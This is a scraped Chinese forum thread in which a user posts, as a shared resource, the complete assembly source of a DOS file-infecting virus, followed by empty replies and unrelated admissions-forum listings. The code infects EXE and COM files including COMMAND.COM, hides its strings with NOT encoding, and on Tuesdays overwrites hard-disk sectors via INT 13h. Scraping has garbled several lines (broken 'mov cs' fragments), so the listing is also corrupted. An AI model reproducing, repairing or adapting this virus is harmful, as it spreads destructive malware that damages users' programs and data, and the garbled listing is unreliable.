版块导航: 正在加载中...

登录注册

应《网络安全法》要求，自2017年10月1日起，未进行实名认证将不得使用互联网跟帖服务。为保障您的帐号能够正常使用，请尽快对帐号进行手机号验证，感谢您的理解与支持！

24小时热门版块排行榜

返回列表

当前主题已经存档。

航空母舰

金虫 (正式写手)

应助: 0 (幼儿园)
金币: 471.7
散金: 262
帖子: 594
在线: 138.8小时
虫号: 71623
注册: 2005-05-31
专业: 凝聚态物性I:结构、力学和

[交流] [资源]一个简单的文件型病毒程序

一个简单的文件型病毒程序

; ************************************************
; 简单病毒程序
;
; 作者 : 稻香老农 http://www.5xSoft.com
; 类型 : 文件型
; 发作时间: 星期二
; 发作现象: 硬盘数据被坏
; 感染对象: DOS 的 EXE COM 文件
; 编译工具: MASM 6.0 , MASM 6.11
;
; ************************************************

CODE SEGMENT
assume cs:code
.386
org 100h
start:
mov cs

ldsp,sp ; 保存原程序的堆栈指针
mov cs

ldss,ss ;
mov sp,stack_end
mov ax,cs ; 设置新的堆栈指针
mov ss,ax ;

push ds ;保存原 ds es
push es ;
mov ds,ax
mov es,ax
sub ax,oldseg ; 算出原程序的入口
push ax ; 并保存入栈
push oldip ;
call setfile ;程序的核心部分
pop cs

ldip ; 取回原程序的入口
pop cs

ldseg ;
pop es ; 恢复原 es ds
pop ds ;
mov sp,cs

ldss ; 恢复原 ss,sp
mov ss,sp ;
mov sp,cs

ldsp ;
push oldseg ;跳回原程序入口点
push oldip ;
retf ;
db 09ah

getdate proc near ;这个函数是取得时间是否是星期二是则破坏硬盘数据

mov ax,0ec32h ; 写要执行的代码 int 13h
not ax ; 到 @dest1 位置
mov si,@des1 ; 这里既加密代码
mov word ptr [si],ax ;
mov ah,2ah
int 21h
cmp al,2
jnz @gd_con
mov ax,312h
mov cx,1
mov dx,80h
@des1:
db 0ebh
db 32
ret
@gd_con:
ret

getdate endp

setfile1 proc near
call findfirst
@sf_con:
jc @sf_back
call modify
call findnext
jmp @sf_con
@sf_back:
ret
setfile1 endp
setdata proc near
push si
push di
push cx
push ax
pushf
mov si,offset normal1
mov di,si
mov cx,23h
@aaa2:
lodsb
not ax
stosb
loop @aaa2
popf
pop ax
pop cx
pop di
pop si
ret
setdata endp

setfile proc near
cmp ax,127h ; 没有作用只是干挠
jnz @aaa1 ; ax 不可能等于 127h
call dword ptr oldsp ;
ret ;
db 0e8h ;
@aaa: call getdate
ret

@aaa1:
mov ah,01ah ;设置磁盘传输地址
mov dx,offset dta ;用于 findfirst
int 21h ;
call setdata ;数据解密
push @aaa
mov dx,offset normal1 ; 找 *.exe
mov ax,offset dta
add ax,01eh
mov fs,ax ; fs 用于传递文件名的地址
call setfile1 ; 传染文件
mov dx,offset normal2 ; 找 *.com
call setfile1
mov dx,offset bootcmd ; 找 c:\windows\command.com
mov fs,dx
call setfile1
mov dx,offset bootcmd1 ; 找 c:\command.com
mov si,dx ;
mov word ptr [si],':C' ;
mov fs,dx ;
call setfile1 ;
ret
setfile endp
db 09ah
findfirst proc near
mov ax,04e27h
int 21h
ret
findfirst endp

findnext proc near
mov ah,04fh
int 21h
ret
findnext endp

modify proc near ;修改并感染程序
mov si,offset sbuffer ;可执行的文件头的地址
mov di,offset dta ;文件信息的地址

cmp dword ptr [di+01ah],1000 ; 若文件小于 1K 或大于 1M 不感染
jb @fn_ret ;
cmp dword ptr [di+01ah],0ffcffh ;
jae @fn_ret ;

mov dx,fs
mov ax,4300h ;保存原文件属性
int 21h ;再改为没有属性
push cx ;
mov ax,4301h
xor cx,cx
int 21h

mov ax,03d02h ; 打开文件
int 21h ;
jc @fn_ret3 ;

mov bx,ax ; 读文件头
mov ah,03fh ;
mov cx,1ch ;
mov dx,offset sbuffer ;
int 21h ;

cmp word ptr [si],'ZM' ; 如不是可执行文件就不感染
jnz @fn_ret1 ;

mov ax,word ptr [si+014h] ; 保存原程序入口
mov oldip,ax ;
mov ax,word ptr [si+016h] ;
mov oldseg,ax

mov ax,4200h ; 检查是否已经被我感染过
mov cx,word ptr [di+1ch] ;
mov dx,word ptr [di+1ah] ;
sub dx,2 ;
int 21h ;
mov ah,3fh ;
mov cx,2 ;
mov dx,offset temp ;
int 21h
cmp word ptr temp,0dcd6h ; 若已经被感染就返回
jz @fn_ret1 ;

mov eax,dword ptr [di+01ah] ; 得到文件的总长
mov cx,0fh
and cx,ax ; 算出感染后的入口点
mov fill,010h ;
sub fill,cx ;
movzx ecx,fill ;
add eax,ecx ;
sub eax,100h
shr eax,4
mov cx,word ptr [si+8]
sub ax,cx
mov word ptr [si+14h],100h
mov word ptr [si+16h],ax
sub ax,oldseg
mov oldseg,ax

mov ax,4202h ;把本病毒写至文件尾
xor cx,cx ;
xor dx,dx ;
int 21h
call setdata
mov ah,40h
mov cx,offset theend
mov dx,offset start
sub dx,fill
sub cx,dx
int 21h
call setdata
jc @fn_ret1

mov ax,4202h ; 算出加载程序的长度
xor cx,cx ;
xor dx,dx ;
int 21h
mov cx,200h
div cx
inc ax
mov word ptr [si+2],dx
mov word ptr [si+4],ax

mov ax,4200h ;改写文件头
xor cx,cx
xor dx,dx
int 21h
mov ah,40h
mov dx,si
mov cx,1ch
int 21h

@fn_ret1:
mov ah,03eh ;关闭文件
int 21h ;
@fn_ret3:
pop cx ;恢复原文件属性
mov ax,4301h ;
mov dx,gs
int 21h
@fn_ret:
ret
modify endp

oldip word 0
oldseg word 0

;======== 用 not 换算过的数据 ========
normal1 db 0d5h,0d1h,09ah,087h,09ah,0ffh ; '*.EXE'
normal2 db 0d5h,0d1h,09ch,090h,092h,0ffh ; '*.COM'
bootcmd db 0bch,0c5h,0a3h,0a8h,0b6h,0b1h,0bbh,0b0h ; 'C:\WINDO'
bootcmd1 db 0a8h,0ach,0a3h,0bch,0b0h,0b2h,0b2h,0beh ; 'WS\COMMAND.COM'
db 0b1h,0bbh,0d1h,0bch,0b0h,0b2h,0ffh
fl word 0dcd6h
theend:
oldsp word 0
oldss word 0
temp word 0
temp1 word 0
dta db 02bh dup(0)
fill word 0
sbuffer db 1dh dup(0)
stack_start db 40h dup(0)
stack_end:
code ends
end start

[ Last edited by 幻影无痕 on 2006-10-5 at 13:50 ]

回复此楼

» 猜你喜欢

291求调剂已经有7人回复
300求调剂已经有8人回复
求调剂推荐已经有7人回复
289 分105500药学专硕求调剂(找B区学校) 已经有4人回复
0854求调剂已经有13人回复
初试324 中药学一志愿天中医求调剂已经有3人回复
药学求调剂已经有14人回复
327求调剂已经有27人回复
急需调剂已经有5人回复
271求调剂已经有33人回复

1楼 2005-08-21 10:27:47

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

angeldeer

1

2楼2005-08-22 01:03:08

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

yuefour

1

3楼2005-08-22 20:24:43

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

相关版块跳转我要订阅楼主航空母舰的主题更新

返回列表

最具人气热帖推荐 [查看全部]		作者	回/看	最后发表

[考研] 材料相关专业344求调剂双非工科学校或课题组 +21	hualkop 2026-04-12	23/1150	2026-04-15 22:02 by hualkop
[考研] 求调剂学校 +14	不会吃肉 2026-04-13	16/800	2026-04-15 21:59 by noqvsozv
[考研] 294求调剂 +8	淡然654321 2026-04-15	8/400	2026-04-15 21:47 by lbsjt
[考研] 化学070300 求调剂 +23	哈哈哈^_^ 2026-04-12	23/1150	2026-04-14 16:30 by zhouxiaoyu
[教师之家] 转长聘了 +7	简单化xn 2026-04-13	7/350	2026-04-14 14:50 by xindong
[考研] 材料085601调剂 +32	何润采123 2026-04-10	34/1700	2026-04-14 08:47 by 木木mumu～
[考研] 求调剂 +3	我爱高数高数爱� 2026-04-12	3/150	2026-04-14 01:00 by 王珺璞
[考研] 297工科，求调剂? +13	河南农业大学-能 2026-04-12	13/650	2026-04-13 14:12 by dingyanbo1
[考研] 一志愿085802 323分求调剂 +13	drizzle_9 2026-04-12	14/700	2026-04-13 10:26 by Faiz5552
[考研] 一志愿西北工业大学289 085602 +33	yang婷 2026-04-10	34/1700	2026-04-12 08:11 by Art1977
[考研] 调剂 +6	青灯不负 2026-04-09	6/300	2026-04-11 20:35 by dongdian1
[考研] 求调剂，一志愿大连理工大学354分 +5	雨声余生 2026-04-11	6/300	2026-04-11 16:12 by 雨声余生
[考研] 0854调剂 +5	音像店听花鼓戏 2026-04-10	5/250	2026-04-11 10:49 by qingpingzhu
[考研] 机械专硕270求调剂，接受跨专业 +12	老师看看我吧aba 2026-04-09	14/700	2026-04-11 10:21 by laoshidan
[考研] 调剂 +19	小张ZA 2026-04-10	20/1000	2026-04-10 22:08 by 猪会飞
[考研] 314求调剂 +18	xhhdjdjsjks 2026-04-09	19/950	2026-04-10 18:53 by HPUCZ
[考研] 282，电气工程专业，求调剂，不挑专业 +9	jggshjkkm 2026-04-10	9/450	2026-04-10 14:55 by 逆水乘风
[考研] 一志愿中科大070300化学，314分求调剂 +12	wakeluofu 2026-04-09	12/600	2026-04-10 09:57 by liuhuiying09
[考研] 已调剂 +18	柴郡猫_ 2026-04-09	19/950	2026-04-09 22:10 by 柴郡猫_
[考研] 一志愿中科院105500专业总分315求调剂 +6	lallalh 2026-04-09	7/350	2026-04-09 17:51 by lallalh